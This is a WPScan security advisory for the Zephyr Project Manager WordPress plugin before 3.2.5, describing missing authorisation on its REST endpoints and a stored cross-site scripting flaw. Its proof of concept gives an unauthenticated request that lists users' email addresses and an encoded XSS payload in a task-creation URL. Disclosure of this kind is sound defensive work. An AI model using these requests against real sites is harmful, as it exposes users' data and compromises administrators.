WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Zephyr Project Manager < 3.2.5 - Unauthorised REST Calls to Stored XSS

Description

The plugin does not have proper authorisation (even when the Require Authorisation for REST API Requests is enabled) in all its REST endpoints, allowing unauthenticated users to call them either directly. Furthermore, due to the lack of sanitisation and escaping, it could also allow them to perform Stored Cross-Site Scripting attacks against logged in admins

Proof of Concept

Get all users email addresses: http://example.com/wp-json/zephyr_project_manager/v1/users

http://example.com/wp-json/zephyr_project_manager/v1/tasks/create/?name=%22%20style%3danimation-name%3arotation%20onanimationstart%3dalert(%2fXSS%2f)%2f%2f

The XSS will be trigged when viewing a list where the tasks is displayed, for example All Tasks at /wp-admin/admin.php?page=zephyr_project_manager_tasks

Affects Plugins

zephyr-project-manager
Fixed in version 3.2.5

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID
bfd8a7aa-5977-4fe5-b2fc-12bf93caf3ed

Timeline

Publicly Published

2022-08-29 (about 9 months ago)

Added

2022-08-29 (about 9 months ago)

Last Updated

2022-08-29 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin